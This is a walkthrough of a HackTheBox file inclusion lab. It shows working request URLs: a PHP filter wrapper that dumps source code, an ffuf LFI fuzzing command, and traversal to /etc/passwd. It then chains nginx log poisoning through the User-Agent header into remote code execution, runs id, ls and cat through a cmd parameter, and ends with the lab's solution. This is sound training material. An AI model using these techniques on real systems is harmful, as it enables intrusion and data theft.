HackTheBox - File Inclusion - Skills Assessment Walkthrough
Ido Abramov
Scenario
The company INLANEFREIGHT has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered in the module sections to complete this module.
Don't forget to think outside the box!
Walkthrough
Accessing the target URL redirects us to the next page:
When browsing, we notice the page parameter appears in each URL as we switch pages:
Intercept a request using Burp:
Next, we test LFI payloads against the page parameter using Burp Intruder.
As we can see, we didn’t achieve any good results.
It seems like a dead end for now, unless we find another URL with a parameter that’s vulnerable to LFI.
We can infer that the application loads files like "industries," "contact," and "about" via the page parameter. So, we might try loading the index file itself, encoded in Base64 - to retrieve its full code and look for potential new attack vector.
Use the PHP filter wrapper to access the index file:
GET /index.php?page=php://filter/read=convert.base64-encode/resource=index
And we successfully retrieved the file content in Base64:
Next, send the content into Burp Decoder to decode it:
And we got the full code of index:
<!DOCTYPE html>
<html lang="en">
<head>
<title>InlaneFreight</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:200,300,400,700,900|Display+Playfair:200,300,400,700">
<link rel="stylesheet" href="fonts/icomoon/style.css">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/jquery-ui.css">
<link rel="stylesheet" href="css/owl.carousel.min.css">
<link rel="stylesheet" href="css/owl.theme.default.min.css">
<link rel="stylesheet" href="css/bootstrap-datepicker.css">
<link rel="stylesheet" href="fonts/flaticon/font/flaticon.css">
<link rel="stylesheet" href="css/aos.css">
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<div class="site-wrap">
<div class="site-mobile-menu">
<div class="site-mobile-menu-header">
<div class="site-mobile-menu-close mt-3">
<span class="icon-close2 js-menu-toggle"></span>
</div>
</div>
<div class="site-mobile-menu-body"></div>
</div>
<header class="site-navbar py-3" role="banner">
<div class="container">
<div class="row align-items-center">
<div class="col-11 col-xl-2">
<h1 class="mb-0"><a href="index.php" class="text-white h2 mb-0">InlaneFreight</a></h1>
</div>
<div class="col-12 col-md-10 d-none d-xl-block">
<nav class="site-navigation position-relative text-right" role="navigation">
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
</nav>
</div>
<div class="d-inline-block d-xl-none ml-md-0 mr-auto py-3" style="position: relative; top: 3px;"><a href="#" class="site-menu-toggle js-menu-toggle text-white"><span class="icon-menu h3"></span></a></div>
</div>
</div>
</div>
</header>
<div class="site-blocks-cover overlay" style="background-image: url(images/hero_bg_1.jpg);" data-aos="fade" data-stellar-background-ratio="0.5">
<div class="container">
<div class="row align-items-center justify-content-center text-center">
<div class="col-md-8" data-aos="fade-up" data-aos-delay="400">
<h1 class="text-white font-weight-light mb-5 text-uppercase font-weight-bold">Worldwide Freight Services</h1>
<p><a href="#" class="btn btn-primary py-3 px-5 text-white">Get Started!</a></p>
</div>
</div>
</div>
</div>
<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>
<footer class="site-footer">
<div class="row pt-5 mt-5 text-center">
<div class="col-md-12">
<div class="border-top pt-5">
<p>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
Copyright ©<script>document.write(new Date().getFullYear());</script> All rights reserved | This template is made with <i class="icon-heart" aria-hidden="true"></i> by <a href="https://colorlib.com" target="_blank" >Colorlib</a>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
</p>
</div>
</div>
</footer>
</div>
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/jquery-migrate-3.0.1.min.js"></script>
<script src="js/jquery-ui.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.stellar.min.js"></script>
<script src="js/jquery.countdown.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/bootstrap-datepicker.min.js"></script>
<script src="js/aos.js"></script>
<script src="js/main.js"></script>
</body>
</html>
We can see there’s another path: ilf_admin/index.php:
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
Navigate to the new path:
Here, you can view log pages by log-type:
We notice a log parameter that changes as we navigate between pages. We can test whether it’s vulnerable to LFI.
This time, I’ll use the ffuf tool, as it’s much faster than Burp Community Intruder:
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://83.136.253.59:30150/ilf_admin/index.php?log=FUZZ' -fs 2046
** I use -fs 2046 because the first time I ran it, many invalid results had a size of 2046, so I filtered those out.
And the results:
After testing the payload ../../../../../../../../etc/passwd, we confirmed that the parameter is indeed vulnerable to LFI.
From the last line, we can see a reference to the nginx user, which suggests the application is likely running on the NGINX web server. If that’s the case, it probably writes logs to /var/log/nginx/access.log.
Let’s leverage the LFI vulnerability to retrieve the contents of /var/log/nginx/access.log:
And it worked — we successfully retrieved the log file !
Now, since the application is executing files through a PHP context, if we can inject a PHP web shell into the log file, we may be able to achieve Remote Code Execution (RCE).
By examining the logs, we can see that the application records the User-Agent header.
Let’s try injecting a PHP shell payload into the User-Agent header of a request:
Then navigate to:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=id
And we can see the output:
We’ve achieved RCE - now it’s time to retrieve the flag !
First, list all files in the root directory:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=ls+/
We can see a file named flag_dacc60f2348d.txt. Let’s view its contents using:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt
The flag is captured ! 😁
Subscribe to my newsletter
Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by